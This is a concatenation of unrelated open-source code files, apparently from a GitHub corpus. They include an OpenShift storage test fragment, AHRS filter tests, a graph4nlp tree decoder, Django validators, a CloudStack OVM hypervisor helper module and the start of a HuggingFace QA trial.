f"Scaling back {constants.NOOBAA_OPERATOR_DEPLOYMENT} deployment to replica: 1"
)
dep_ocp.exec_oc_cmd(
f"scale deployment {constants.NOOBAA_OPERATOR_DEPLOYMENT} --replicas=1"
)
# Wait and validate noobaa PVC is in bound state
pvc_obj.wait_for_resource(
condition=constants.STATUS_BOUND,
resource_name=noobaa_pvc_obj[0].name,
timeout=600,
sleep=120,
)
# Validate noobaa pods are up and running
pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
noobaa_pods = get_noobaa_pods()
pod_obj.wait_for_resource(
condition=constants.STATUS_RUNNING,
resource_count=len(noobaa_pods),
selector=constants.NOOBAA_APP_LABEL,
timeout=900,
)
# Verify everything running fine
logger.info("Verifying all resources are Running and matches expected result")
self.sanity_helpers.health_check(tries=120)
# Verify default backingstore/bucketclass
default_bs = OCP(
kind=constants.BACKINGSTORE, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
).get(resource_name=DEFAULT_NOOBAA_BACKINGSTORE)
default_bc = OCP(
kind=constants.BUCKETCLASS, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
).get(resource_name=DEFAULT_NOOBAA_BUCKETCLASS)
assert (
default_bs["status"]["phase"]
== default_bc["status"]["phase"]
== constants.STATUS_READY
), "Failed: Default bs/bc are not in ready state"
# Create OBCs
logger.info("Creating OBCs after noobaa rebuild")
bucket_factory(amount=3, interface="OC", verify_health=True)
|
tests/test_new.py
|
Mayitzin/ahrs
| 184 |
88491
|
<gh_stars>100-1000
#! /usr/bin/python3
# -*- coding: utf-8 -*-
"""
Pytest-based testing
====================
This file performs automated tests with pytest. It does not generate charts
or output to be reviewed.
Run with: pytest-3 tests/test_new.py
Run with: pytest-3 tests/test_new.py -s -vv --cov=ahrs for coverage + verbose
Copyright 2021 <NAME> and <NAME> <<EMAIL>>
Released under MIT License
Formatted with Black
References
----------
.. [Crassidis] <NAME> (2007) A Survey of Nonlinear Attitude
Estimation Methods.
.. [Teage] <NAME> (2016) Comparison of Attitude Estimation Techniques for
Low-cost Unmanned Aerial Vehicles.
https://arxiv.org/pdf/1602.07733.pdf
http://ancs.eng.buffalo.edu/pdf/ancs_papers/2007/att_survey07.pdf
.. [Cirillo] <NAME> et al. (2016) A comparison of multisensor attitude
estimation algorithms.
https://www.researchgate.net/profile/Pasquale_Cirillo/publication/303738116_A_comparison_of_multisensor_attitude_estimation_algorithms/links/5750181208aeb753e7b4a0c0/A-comparison-of-multisensor-attitude-estimation-algorithms.pdf
"""
import numpy as np
import pytest
import scipy.io as sio
import ahrs
import ahrs.utils.io
DEG2RAD = ahrs.common.DEG2RAD
class Data:
acc = None
gyr = None
mag = None
@pytest.fixture()
def data():
fn = "tests/ExampleData.mat"
mat = sio.loadmat(fn)
d = Data()
d.acc = mat["Accelerometer"]
d.gyr = mat["Gyroscope"]
d.mag = mat["Magnetometer"]
d.num_samples = len(d.acc)
assert d.num_samples
assert len(d.acc[0]) == 3
assert len(d.gyr[0]) == 3
assert len(d.mag[0]) == 3
return d
def check_integrity(Q):
assert Q is not None
sz = Q.shape
qts_ok = not np.allclose(np.sum(Q, axis=0), sz[0] * np.array([1.0, 0.0, 0.0, 0.0]))
qnm_ok = np.allclose(np.linalg.norm(Q, axis=1).mean(), 1.0)
assert qts_ok and qnm_ok
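# Illustrative example (hypothetical values) of an array that check_integrity accepts:
#   Q = np.array([[1.0, 0.0, 0.0, 0.0],
#                 [0.70710678, 0.70710678, 0.0, 0.0]])
#   check_integrity(Q)  # passes: rows are unit quaternions and are not all the identity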
@pytest.fixture()
def Q(data):
q = np.zeros((data.num_samples, 4))
q[:, 0] = 1.0
return q
def test_fourati(data, Q):
fourati = ahrs.filters.Fourati()
for t in range(1, data.num_samples):
Q[t] = fourati.update(Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t])
# check_integrity(Q)
assert tuple(Q[0]) == (
0.9999984512506995,
-7.923098356158542e-05,
-0.00010998618261451432,
7.783371117384885e-05,
)
assert tuple(Q[-1]) == (
0.8321632262796078,
0.17064875423856807,
-0.27862737470349475,
0.44805150772046,
)
def test_ekf(data, Q):
ekf = ahrs.filters.EKF()
for t in range(1, data.num_samples):
Q[t] = ekf.update(Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t])
check_integrity(Q)
assert tuple(Q[0]) == (1.0, 0.0, 0.0, 0.0)
assert tuple(Q[1]) == (
0.9948152433072915,
0.030997430898554206,
-0.09666743395232329,
0.006099030596487108,
)
assert tuple(Q[-1]) == (
0.08996443890695231,
0.23991941374716044,
-0.958073763949303,
-0.1282175396402196,
)
def test_mahony(data, Q):
mahony = ahrs.filters.Mahony()
for t in range(1, data.num_samples):
Q[t] = mahony.updateMARG(
Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t]
)
check_integrity(Q)
assert tuple(Q[0]) == (
0.9999883099133865,
-0.0007983637760660701,
0.004762298093153807,
0.00025133388483027455,
)
assert tuple(Q[-1]) == (
-0.10375763267292282,
-0.007875376758085736,
-0.05233084545763538,
0.9931937448034588,
)
def test_madgwick(data, Q):
madgwick = ahrs.filters.Madgwick()
for t in range(1, data.num_samples):
Q[t] = madgwick.updateMARG(
Q[t - 1], DEG2RAD * data.gyr[t], data.acc[t], data.mag[t]
)
check_integrity(Q)
assert tuple(Q[0]) == (
0.999999906169997,
-0.00039564882735884275,
-0.00017641407301677547,
-2.78332338967451e-07,
)
assert tuple(Q[-1]) == (
0.9524138044137933,
-0.10311931931141746,
0.0038985200624795592,
0.28680856453062387,
)
def test_distance():
a = np.random.random((2, 3))
d = ahrs.utils.metrics.euclidean(a[0], a[1])
assert np.allclose(d, np.linalg.norm(a[0] - a[1]))
|
trains/backend_api/session/__init__.py
|
doliveralg/trains
| 112 |
88513
|
<reponame>doliveralg/trains
from .session import Session
from .datamodel import DataModel, NonStrictDataModel, schema_property, StringEnum
from .request import Request, BatchRequest, CompoundRequest
from .response import Response
from .token_manager import TokenManager
from .errors import TimeoutExpiredError, ResultNotReadyError
from .callresult import CallResult
|
graph4nlp/pytorch/modules/prediction/generation/TreeBasedDecoder.py
|
cminusQAQ/graph4nlp
| 1,269 |
88530
|
<gh_stars>1000+
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from graph4nlp.pytorch.modules.utils.tree_utils import Tree, to_cuda
from .attention import Attention
from .base import RNNTreeDecoderBase
class StdTreeDecoder(RNNTreeDecoderBase):
r"""StdTreeDecoder: This is a tree decoder implementation, which is used for tree object decoding.
Attributes
----------
attn_type : str,
        Describes which attention mechanism is used; can be ``uniform``,
``separate_on_encoder_type``, ``separate_on_node_type``.
embeddings : torch.nn.Module,
Embedding layer, input is tensor of word index, output is word embedding tensor.
enc_hidden_size : int,
Size of encoder hidden state.
dec_emb_size : int,
Size of decoder word embedding layer output size.
dec_hidden_size : int,
Size of decoder hidden state. (namely the ``lstm`` or ``gru``
hidden size when rnn unit has been specified)
output_size : int,
Size of output vocabulary size.
teacher_force_ratio : float,
The ratio of possibility to use teacher force training.
    use_sibling : boolean,
        Whether to feed the sibling state at each decoding step.
    use_copy : boolean,
        Whether to use the copy mechanism in decoding.
fuse_strategy: str, option=[None, "average", "concatenate"], default=None
The strategy to fuse attention results generated by separate attention.
"None": If we do ``uniform`` attention, we will set it to None.
"``average``": We will take an average on all results.
"``concatenate``": We will concatenate all results to one.
num_layers : int, optional,
Layer number of decoder rnn unit.
dropout_for_decoder: float,
        Dropout ratio for the decoder (includes both the dropout for the word
        embedding and the dropout for the attention layer).
tgt_vocab : object,
        The vocab object used in the decoder, including all the word<->id pairs
        that appear in the output sentences.
graph_pooling_strategy : str,
        The graph pooling strategy used to generate the graph embedding from the node embeddings.
rnn_type: str, optional,
The rnn unit is used, option=["lstm", "gru"], default="lstm".
max_dec_seq_length : int, optional,
In decoding, the decoding steps upper limit.
max_dec_tree_depth : int, optional,
        In decoding, the tree depth upper limit.
"""
def __init__(
self,
attn_type,
embeddings,
enc_hidden_size,
dec_emb_size,
dec_hidden_size,
output_size,
criterion,
teacher_force_ratio,
use_sibling=True,
use_attention=True,
use_copy=False,
fuse_strategy="average",
num_layers=1,
dropout_for_decoder=0.1,
rnn_type="lstm",
max_dec_seq_length=512,
max_dec_tree_depth=256,
tgt_vocab=None,
graph_pooling_strategy="max",
):
super(StdTreeDecoder, self).__init__(
use_attention=True,
use_copy=use_copy,
use_coverage=False,
attention_type="uniform",
fuse_strategy="average",
)
self.num_layers = num_layers
self.criterion = criterion
self.rnn_size = dec_hidden_size
self.enc_hidden_size = enc_hidden_size
self.hidden_size = dec_hidden_size
self.max_dec_seq_length = max_dec_seq_length
self.max_dec_tree_depth = max_dec_tree_depth
self.tgt_vocab = tgt_vocab
self.teacher_force_ratio = teacher_force_ratio
self.use_sibling = use_sibling
self.dec_emb_size = dec_emb_size
self.dropout_input = dropout_for_decoder
self.embeddings = embeddings
self.graph_pooling_strategy = graph_pooling_strategy
self.attn_state = {}
self.use_copy = use_copy
self.attention = Attention(
query_size=dec_hidden_size,
memory_size=enc_hidden_size * 2
if (enc_hidden_size * 2 == dec_hidden_size)
else enc_hidden_size,
hidden_size=dec_hidden_size,
has_bias=True,
dropout=dropout_for_decoder,
attention_funtion="dot",
)
self.separate_attn = attn_type != "uniform"
if self.separate_attn:
self.linear_att = nn.Linear(3 * dec_hidden_size, dec_hidden_size)
else:
self.linear_att = nn.Linear(2 * dec_hidden_size, dec_hidden_size)
self.linear_out = nn.Linear(dec_hidden_size, output_size)
self.dropout_attn = nn.Dropout(dropout_for_decoder)
self.logsoftmax = nn.LogSoftmax(dim=1)
if self.use_copy:
ptr_size = self.embeddings.embedding_dim
ptr_size += 4 * self.rnn_size
self.ptr = nn.Linear(ptr_size, 1)
self.rnn = self._build_rnn(
rnn_type=rnn_type,
input_size=output_size,
emb_size=dec_emb_size,
hidden_size=dec_hidden_size,
dropout_input=dropout_for_decoder,
use_sibling=use_sibling,
)
def _run_forward_pass(
self,
graph_node_embedding,
graph_node_mask,
rnn_node_embedding,
graph_level_embedding,
graph_edge_embedding=None,
graph_edge_mask=None,
tgt_tree_batch=None,
enc_batch=None,
oov_dict=None,
):
r"""
The private calculation method for decoder.
Parameters
----------
enc_batch : torch.Tensor,
The input batch : (Batch_size * Source sentence word index tensor).
tgt_tree_batch:
The target tree to generate : consists of (Batch_size * Tree object),
each node in a Tree object is either a word index or a children Tree object.
graph_node_embedding: torch.Tensor,
The graph node embedding matrix of shape :math:`(B, N, D_{in})`
        graph_node_mask: torch.Tensor,
            The graph node type mask matrix of shape :math:`(B, N)`
        rnn_node_embedding: torch.Tensor,
            The rnn encoded embedding matrix of shape :math:`(B, N, D_{in})`
        graph_level_embedding: torch.Tensor,
            graph level embedding of shape :math:`(B, D_{in})`
        graph_edge_embedding: torch.Tensor,
            graph edge embedding of shape :math:`(B, N, D_{in})`
        graph_edge_mask: torch.Tensor,
            graph edge type embedding
oov_dict: dict,
vocab dict used in copy mechanism to incorporate some new words which
have never appeared in vocab for input sentences in training set.
"""
tgt_batch_size = len(tgt_tree_batch)
enc_outputs = graph_node_embedding
device = graph_node_embedding.device
if graph_level_embedding is None:
if self.graph_pooling_strategy == "max":
graph_level_embedding = torch.max(graph_node_embedding, 1)[0]
elif self.graph_pooling_strategy == "min":
graph_level_embedding = torch.min(graph_node_embedding, 1)[0]
elif self.graph_pooling_strategy == "mean":
graph_level_embedding = torch.mean(graph_node_embedding, 1)
else:
raise NotImplementedError()
graph_cell_state = graph_level_embedding
graph_hidden_state = graph_level_embedding
else:
graph_cell_state, graph_hidden_state = graph_level_embedding
# rnn_node_embedding = torch.zeros_like(graph_node_embedding,
# requires_grad=False).to(device)
cur_index = 1
loss = 0
dec_batch, queue_tree, max_index = get_dec_batch(
tgt_tree_batch, tgt_batch_size, device, self.tgt_vocab
)
dec_state = {}
for i in range(self.max_dec_tree_depth + 1):
dec_state[i] = {}
for j in range(self.max_dec_seq_length + 1):
dec_state[i][j] = {}
while cur_index <= max_index:
if cur_index > self.max_dec_tree_depth:
break
for j in range(1, 3):
dec_state[cur_index][0][j] = torch.zeros(
(tgt_batch_size, self.rnn_size), dtype=torch.float, requires_grad=False
).to(device)
sibling_state = torch.zeros(
(tgt_batch_size, self.rnn_size), dtype=torch.float, requires_grad=False
).to(device)
# with torch.no_grad():
if cur_index == 1:
for i in range(tgt_batch_size):
dec_state[1][0][1][i, :] = graph_cell_state[i]
dec_state[1][0][2][i, :] = graph_hidden_state[i]
else:
for i in range(1, tgt_batch_size + 1):
if cur_index <= len(queue_tree[i]):
par_index = queue_tree[i][cur_index - 1]["parent"]
child_index = queue_tree[i][cur_index - 1]["child_index"]
dec_state[cur_index][0][1][i - 1, :] = dec_state[par_index][child_index][1][
i - 1, :
]
dec_state[cur_index][0][2][i - 1, :] = dec_state[par_index][child_index][2][
i - 1, :
]
flag_sibling = False
for q_index in range(len(queue_tree[i])):
if (
(cur_index <= len(queue_tree[i]))
and (q_index < cur_index - 1)
and (
queue_tree[i][q_index]["parent"]
== queue_tree[i][cur_index - 1]["parent"]
)
and (
queue_tree[i][q_index]["child_index"]
< queue_tree[i][cur_index - 1]["child_index"]
)
):
flag_sibling = True
sibling_index = q_index
if flag_sibling:
sibling_state[i - 1, :] = dec_state[sibling_index][
dec_batch[sibling_index].size(1) - 1
][2][i - 1, :]
parent_h = dec_state[cur_index][0][2]
pred = None
for i in range(dec_batch[cur_index].size(1) - 1):
teacher_force = random.random() < self.teacher_force_ratio
if teacher_force is not True and i > 0:
input_word = pred.argmax(1)
else:
input_word = dec_batch[cur_index][:, i]
pred, rnn_state_iter, attn_scores = self.decode_step(
tgt_batch_size=tgt_batch_size,
dec_single_input=input_word,
dec_single_state=(dec_state[cur_index][i][1], dec_state[cur_index][i][2]),
memory=enc_outputs,
parent_state=parent_h,
oov_dict=oov_dict,
enc_batch=enc_batch,
)
dec_state[cur_index][i + 1][1], dec_state[cur_index][i + 1][2] = rnn_state_iter
pred = torch.log(pred + 1e-31)
loss += self.criterion(pred, dec_batch[cur_index][:, i + 1])
cur_index = cur_index + 1
loss = loss / tgt_batch_size
return loss
def _filter_oov(self, tokens, vocab):
r"""The function used to mask some oov word in word embedding layer."""
ret = tokens.clone()
ret[tokens >= vocab.vocab_size] = vocab.get_symbol_idx(vocab.unk_token)
return ret
def decode_step(
self,
tgt_batch_size,
dec_single_input,
dec_single_state,
memory,
parent_state,
input_mask=None,
memory_mask=None,
memory_candidate=None,
sibling_state=None,
oov_dict=None,
enc_batch=None,
):
"""The decoding function in tree decoder.
Parameters
----------
tgt_batch_size : int,
batch size.
dec_single_input : torch.Tensor,
word id matrix for decoder input: [B, N].
dec_single_state : torch.Tensor
the rnn decoding hidden state: [B, N, D].
memory : torch.Tensor
the encoder output node embedding.
parent_state : torch.Tensor
the parent embedding used in parent feeding mechanism.
input_mask : torch.Tensor, optional
input mask, by default None
memory_mask : torch.Tensor, optional
mask for encoder output, by default None
memory_candidate : torch.Tensor, optional
encoder output used for separate attention mechanism, by default None
sibling_state : torch.Tensor, optional
sibling state for sibling feeding mechanism, by default None
oov_dict : object, optional
out-of-vocabulary object for copy mechanism, by default None
enc_batch : torch.Tensor,
The input batch : (Batch_size * Source sentence word index tensor).
"""
device = memory.device
dec_single_input = self._filter_oov(dec_single_input, self.tgt_vocab)
rnn_state_c, rnn_state_h, dec_emb = self.rnn(
dec_single_input, dec_single_state[0], dec_single_state[1], parent_state, sibling_state
)
attn_collect = []
score_collect = []
if self.separate_attn:
pass
else:
context_vector, attn_scores = self.attention(query=rnn_state_h, memory=memory)
attn_collect.append(context_vector)
score_collect.append(attn_scores)
pred = F.tanh(self.linear_att(torch.cat((context_vector, rnn_state_h), 1)))
decoder_output = self.linear_out(self.dropout_attn(pred))
if self.use_copy:
assert enc_batch is not None
assert oov_dict is not None
output = torch.zeros(tgt_batch_size, oov_dict.vocab_size).to(device)
attn_ptr = torch.cat(attn_collect, dim=-1)
pgen_collect = [dec_emb, torch.cat((rnn_state_c, rnn_state_h), -1), attn_ptr]
prob_ptr = torch.sigmoid(self.ptr(torch.cat(pgen_collect, -1)))
prob_gen = 1 - prob_ptr
gen_output = torch.softmax(decoder_output, dim=-1)
ret = prob_gen * gen_output
need_pad_length = len(oov_dict) - len(self.tgt_vocab)
output = torch.cat((ret, ret.new_zeros((tgt_batch_size, need_pad_length))), dim=1)
# output[:, :self.tgt_vocab.vocab_size] = ret
ptr_output = attn_scores
output.scatter_add_(1, enc_batch, prob_ptr * ptr_output)
decoder_output = output
# decoder_output = -F.threshold(-output, -1.0, -1.0)
else:
decoder_output = torch.softmax(decoder_output, dim=-1)
return decoder_output, (rnn_state_c, rnn_state_h), attn_scores
def _build_rnn(self, rnn_type, input_size, emb_size, hidden_size, dropout_input, use_sibling):
"""_build_rnn : how the rnn unit should be build."""
rnn = TreeDecodingUnit(
input_size, emb_size, hidden_size, dropout_input, use_sibling, self.embeddings
)
return rnn
def forward(self, g, tgt_tree_batch=None, oov_dict=None):
params = self._extract_params(g)
params["tgt_tree_batch"] = tgt_tree_batch
params["oov_dict"] = oov_dict
return self._run_forward_pass(**params)
def _extract_params(self, graph_list):
"""
Parameters
----------
g: GraphData
Returns
-------
params: dict
"""
batch_data_dict = graph_list.batch_node_features
graph_node_emb = batch_data_dict["node_emb"]
# [s_g.node_features["node_emb"] for s_g in graph_list]
rnn_node_emb = batch_data_dict["rnn_emb"]
graph_node_mask = (batch_data_dict["token_id"] != 0).squeeze(-1).float() - 1
if self.use_copy:
src_seq_ret = graph_list.batch_node_features["token_id_oov"]
else:
src_seq_ret = None
return {
"graph_node_embedding": graph_node_emb,
"graph_node_mask": graph_node_mask,
"rnn_node_embedding": rnn_node_emb,
"graph_level_embedding": None,
"graph_edge_embedding": None,
"graph_edge_mask": None,
"enc_batch": src_seq_ret.long() if self.use_copy else None,
}
def create_mask(x, N, device=None):
x = x.data
mask = np.zeros((x.size(0), N))
for i in range(x.size(0)):
mask[i, : x[i]] = 1
return torch.Tensor(mask).to(device)
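# create_mask builds a float padding mask: row i has ones in its first x[i] positions and
# zeros elsewhere. For example, create_mask(torch.tensor([2, 3]), 4) returns a tensor
# equivalent to [[1, 1, 0, 0], [1, 1, 1, 0]].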
class TreeDecodingUnit(nn.Module):
def __init__(
self, input_size, emb_size, hidden_size, dropout_input, use_sibling, dec_embeddings
):
super(TreeDecodingUnit, self).__init__()
self.hidden_size = hidden_size
self.emb_size = emb_size
self.embedding = dec_embeddings
self.dropout = nn.Dropout(dropout_input)
self.lstm = nn.LSTMCell(emb_size + hidden_size * (2 if use_sibling else 1), hidden_size)
self.use_sibling = use_sibling
def forward(self, input_src, prev_c, prev_h, parent_h, sibling_state):
src_emb = self.embedding(input_src)
src_emb = self.dropout(src_emb)
if self.use_sibling:
input_single_step = torch.cat((src_emb, parent_h, sibling_state), 1)
else:
input_single_step = torch.cat((src_emb, parent_h), 1)
prev_cy, prev_hy = self.lstm(input_single_step, (prev_c, prev_h))
return prev_cy, prev_hy, input_single_step
def get_dec_batch(dec_tree_batch, batch_size, device, form_manager):
queue_tree = {}
for i in range(1, batch_size + 1):
queue_tree[i] = []
queue_tree[i].append({"tree": dec_tree_batch[i - 1], "parent": 0, "child_index": 1})
cur_index, max_index = 1, 1
dec_batch = {}
    # max_index: the maximum number of decoder sub-sequences (tree nodes to expand) for any sample in the batch
while cur_index <= max_index:
max_w_len = -1
batch_w_list = []
for i in range(1, batch_size + 1):
w_list = []
if cur_index <= len(queue_tree[i]):
t = queue_tree[i][cur_index - 1]["tree"]
for ic in range(t.num_children):
if isinstance(t.children[ic], Tree):
w_list.append(4)
queue_tree[i].append(
{"tree": t.children[ic], "parent": cur_index, "child_index": ic + 1}
)
else:
w_list.append(t.children[ic])
if len(queue_tree[i]) > max_index:
max_index = len(queue_tree[i])
if len(w_list) > max_w_len:
max_w_len = len(w_list)
batch_w_list.append(w_list)
dec_batch[cur_index] = torch.zeros((batch_size, max_w_len + 2), dtype=torch.long)
for i in range(batch_size):
w_list = batch_w_list[i]
if len(w_list) > 0:
for j in range(len(w_list)):
dec_batch[cur_index][i][j + 1] = w_list[j]
# add <S>, <E>
if cur_index == 1:
dec_batch[cur_index][i][0] = 1
else:
dec_batch[cur_index][i][0] = form_manager.get_symbol_idx("(")
dec_batch[cur_index][i][len(w_list) + 1] = 2
dec_batch[cur_index] = to_cuda(dec_batch[cur_index], device)
cur_index += 1
return dec_batch, queue_tree, max_index
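# Minimal construction sketch for StdTreeDecoder (the sizes, vocab objects and batch inputs
# below are placeholders, not values taken from the original code):
#   embeddings = nn.Embedding(num_embeddings=vocab_size, embedding_dim=300)
#   decoder = StdTreeDecoder(
#       attn_type="uniform", embeddings=embeddings, enc_hidden_size=300,
#       dec_emb_size=300, dec_hidden_size=300, output_size=vocab_size,
#       criterion=nn.NLLLoss(), teacher_force_ratio=1.0, tgt_vocab=tgt_vocab)
#   loss = decoder(batch_graph, tgt_tree_batch=tgt_trees, oov_dict=None)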
|
crowdsourcing/validators/utils.py
|
AKSHANSH47/crowdsource-platform2
| 138 |
88538
|
<filename>crowdsourcing/validators/utils.py
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from rest_framework.exceptions import ValidationError
class EqualityValidator(object):
message = _('The fields {field_names} must be equal.')
missing_message = _('This field is required.')
def __init__(self, fields, message=None):
self.fields = fields
self.serializer_field = None
self.message = message or self.message
self.instance = None
self.initial_data = None
self.validate_non_fields = False
def set_context(self, serializer):
"""
This hook is called by the serializer instance,
prior to the validation call being made.
"""
self.instance = getattr(serializer, 'instance', None)
self.initial_data = getattr(serializer, 'initial_data', None)
self.validate_non_fields = getattr(serializer, 'validate_non_fields', False)
def __call__(self, *args, **kwargs):
if self.validate_non_fields:
if self.fields[0] not in self.initial_data or self.fields[1] not in self.initial_data:
raise ValidationError("Both fields are required.")
if self.initial_data.get(self.fields[0], 'Password1') != self.initial_data.get(self.fields[1],
'Password2'):
field_names = ', '.join(self.fields)
raise ValidationError(self.message.format(field_names=field_names))
class LengthValidator(object):
message = _('Field {field_name} must be at least {length} characters long.')
missing_message = _('Field {field_name} is required.')
def __init__(self, field, length, message=None):
self.field = field
self.length = length
self.serializer_field = None
self.message = message or self.message
self.initial_data = None
self.validate_non_fields = False
def set_context(self, serializer):
self.initial_data = getattr(serializer, 'initial_data', None)
self.validate_non_fields = getattr(serializer, 'validate_non_fields', False)
def __call__(self, *args, **kwargs):
if self.validate_non_fields:
if self.field not in self.initial_data:
raise ValidationError(self.missing_message.format(field_name=self.field))
if len(self.initial_data[self.field]) < self.length:
raise ValidationError(self.message.format(field_name=self.field, length=self.length))
class InequalityValidator(object):
message = _('Field {field_name} must be {field_operator} than {field_value}.')
def __init__(self, field, value, operator, message=None):
self.field = field
self.value = value
        self.operator = operator
self.message = message or self.message
self.initial_data = None
def set_context(self, serializer):
self.initial_data = getattr(serializer, 'initial_data', None)
def __call__(self, *args, **kwargs):
if self.initial_data[self.field] >= self.value and self.operator == 'lt':
raise ValidationError(self.message.format(field_name=self.field,
field_operator='less', field_value=self.value))
elif self.initial_data[self.field] <= self.value and self.operator == 'gt':
raise ValidationError(self.message.format(field_name=self.field,
field_operator='greater', field_value=self.value))
class ConditionallyRequiredValidator(object):
message = _('Field {field2_name} is required because {field_name} is {type_value}.')
def __init__(self, field, value, field2, message=None):
self.field = field
self.value = value
self.field2 = field2
self.message = message or self.message
self.initial_data = None
def set_context(self, serializer):
self.initial_data = getattr(serializer, 'initial_data', None)
def __call__(self, *args, **kwargs):
if self.initial_data[self.field] == self.value and self.field2 not in self.initial_data:
raise ValidationError(self.message.format(field_name=self.field, field2_name=self.field2,
type_value=self.value))
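# Rough usage sketch (the serializer below is hypothetical): these validators are attached
# to a DRF serializer so that set_context() receives the serializer before __call__ runs:
#   class PasswordSerializer(serializers.Serializer):
#       class Meta:
#           validators = [
#               EqualityValidator(fields=('password1', 'password2')),
#               LengthValidator('password1', 8),
#           ]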
|
plugins/hypervisors/ovm/src/main/scripts/vm/hypervisor/ovm/OvmCommonModule.py
|
ycyun/ablestack-cloud
| 1,131 |
88569
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''
Created on May 17, 2011
'''
try:
import json
except ImportError:
import simplejson as json
from OvmObjectModule import *
import types
import logging
import popen2
import subprocess
from OvmFaultConstants import toErrCode, dispatchErrCode, NoVmFoundException, ShellExceutedFailedException
from xmlrpclib import Fault as XmlRpcFault
from OVSCommons import *
from OvmLoggerModule import OvmLogger
from OVSXXenStore import xen_get_vm_path
from OVSSiteRMServer import get_master_ip
HEARTBEAT_TIMESTAMP_FORMAT='<timestamp>%s</timestamp>'
HEARTBEAT_TIMESTAMP_PATTERN=r'(\<timestamp\>\d+.\d+<\/timestamp\>)'
HEARTBEAT_DIR='heart_beat'
ETC_HOSTS='/etc/hosts'
HOSTNAME_FILE='/etc/sysconfig/network'
OWNER_FILE_PREFIX='host_'
OCFS2_CONF='/etc/ocfs2/cluster.conf'
logger = OvmLogger('OvmCommon')
def setAttrFromDict(obj, name, refDict, convertFunc=None):
if not convertFunc:
setattr(obj, name, refDict[name])
else:
setattr(obj, name, convertFunc(refDict[name]))
def safeSetAttr(obj, name, value):
if not hasattr(obj, name): raise Exception("%s doesn't have attribute %s"%(obj.__class__.__name__, name))
setattr(obj, name, value)
def toAscii(jstr):
return str(jstr).encode('ascii', 'ignore')
def toAsciiHook(dct):
for k in dct:
v = dct[k]
if type(v) is types.UnicodeType:
v = toAscii(v)
del dct[k]
k = toAscii(k)
dct[k] = v
return dct
def asciiLoads(jStr):
jStr = str(jStr).replace("'", '"').replace('False', 'false').replace('True', 'true')
return json.loads(jStr, object_hook=toAsciiHook)
def exceptionIfNoSuccess(str, errMsg=None):
if not errMsg: errMsg = str
if not "success" in str: raise Exception("%s (%s)"%(errMsg, str))
def successToMap(str, sep=';'):
if not str.startswith("success"): raise Exception(str)
str = str[len('success:'):]
dct = {}
for pair in str.split(sep):
(key, value) = pair.split('=', 1)
dct[key] = value
return dct
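# Example (illustrative values): successToMap("success:ip=10.0.0.1;port=8899") returns
# {'ip': '10.0.0.1', 'port': '8899'}; any string that does not start with "success" raises.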
def jsonSuccessToMap(str):
dct = json.loads(str)
if dct['status'] != 'SUCC': raise Exception(str)
return dct['value']
def safeDictSet(obj, dct, name):
if not hasattr(obj, name): raise Exception("%s has no attribute %s for encoding"%(obj.__class__.__name__, name))
dct[name] = getattr(obj, name)
def normalizeToGson(str):
    return str.replace('\\', '').strip('"').replace('"{', '{').replace('}"', '}')
def toGson(obj):
return normalizeToGson(json.dumps(obj))
def MtoBytes(M):
return M * 1024 * 1024
def BytesToM(bytes):
return bytes/(1024*1024)
def BytesToG(bytes):
return bytes/(1024*1024*1024)
def runCmd(cmds):
process = subprocess.Popen(cmds, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode != 0:
raise ShellExceutedFailedException(stderr, process.returncode)
return stdout
def doCmd(lst):
cmds = [str(i) for i in lst]
cmdStr = ' '.join(cmds)
logger.debug(doCmd, cmdStr)
res = runCmd(cmdStr)
logger.debug(doCmd, 'result:' + res)
return res
def execute(cmd):
p = popen2.Popen3(cmd, True)
if (p.wait() != 0):
raise Exception("Failed to execute command. Command: " + cmd + ", Error: " + p.childerr.read())
return p.fromchild.read()
def getDomId(vm_name):
return execute("xm list | grep " + vm_name + " | awk '{print $2}'").strip()
def raiseExceptionIfFail(res):
if not "success" in res and not "SUCC" in res: raise Exception(res)
def ipToHeartBeatFileName(ip):
return ip.replace('.', '_') + "_HEARTBEAT"
def getVmNameFromConfigureFile(cfgPath):
fd = open(cfgPath)
for i in fd.readlines():
i = i.strip()
if i.startswith('name'):
(key, value) = i.split("=", 1)
value = value.strip().strip("'")
fd.close()
return value
fd.close()
raise Exception('Cannot find vm name in %s'%cfgPath)
def makeOwnerFileName():
hostIp = successToMap(get_master_ip())['ip']
ownerFileName = OWNER_FILE_PREFIX + hostIp.replace('.', '_')
return ownerFileName
|
model_hub/examples/huggingface/question-answering/qa_beam_search_trial.py
|
shiyuann/determined
| 1,729 |
88586
|
<filename>model_hub/examples/huggingface/question-answering/qa_beam_search_trial.py
"""
This example is largely based on the question-answering example in the huggingface
transformers library. The license for the transformers library is reproduced below.
==================================================================================================
Copyright 2020 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import functools
import logging
from typing import Dict, Union
import attrdict
import data_beam_search
import datasets
import qa_utils
import torch
import transformers
import determined.pytorch as det_torch
import model_hub.huggingface as hf
class QABeamSearchTrial(hf.BaseTransformerTrial):
def __init__(self, context: det_torch.PyTorchTrialContext) -> None:
self.logger = logging.getLogger(__name__)
self.hparams = attrdict.AttrDict(context.get_hparams())
self.data_config = attrdict.AttrDict(context.get_data_config())
self.context = context
